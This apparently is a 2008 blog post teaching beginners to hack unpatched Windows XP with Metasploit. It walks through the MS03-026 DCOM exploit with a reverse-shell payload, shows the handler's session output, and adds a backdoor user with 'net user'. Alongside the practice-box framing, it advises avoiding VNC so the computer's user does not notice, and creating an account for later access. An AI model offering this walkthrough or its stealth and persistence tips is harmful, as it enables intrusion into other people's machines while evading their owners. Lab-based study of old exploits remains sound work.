A good way to learn how to start hacking is setting up a practice box. I usually just setup a fresh install of XP with no update. This makes life easy it's like progressing, you start with an open box try to hack it, patch it try to hack it again, secure it try to hack it again etc.. so you learn how to grow from the bottom up. Believe it, it is 2008 and there are still some people who do not run sp2 which will shield you from my following example. Metasploit is great program for n00b's you can see the Framework so you know how it works and you can monitor your network or the hack box for you can see exactly what it is doing. For this example I'll be using metasploit web interface which I never used a couple years ago. So you launch the interface and browse over to http://127.0.0.1:55555 for this example I will be using the Exploit Microsoft FPC DCOM MS03-026 once you select it you will be prompted with payloads I always choose win32_reverse which will give you a command prompt to that computer. My advice would not to use VNC since it will look the user out of there computer and they will notice somehting is up. I like to make my own user account so If I'm ever actually at the computer I have a username and password. So when you deliver the payload you will get this.
[*] Starting Reverse Handler.
[*] Sending request...
[*] Got connection from 10.10.10.197:4321 <-> 10.10.10.134:2255
[*] Shell started on session 1
When you click on session 1 you will get the shell.
We are going to add a user named metasploit.
C:\WINDOWS\system32>
>> net user metasploit /add
net user metasploit /add
The command completed successfully.
C:\WINDOWS\system32>
You can choose to change the users password, change admin password etc.. have fun with it.
No comments:
Post a Comment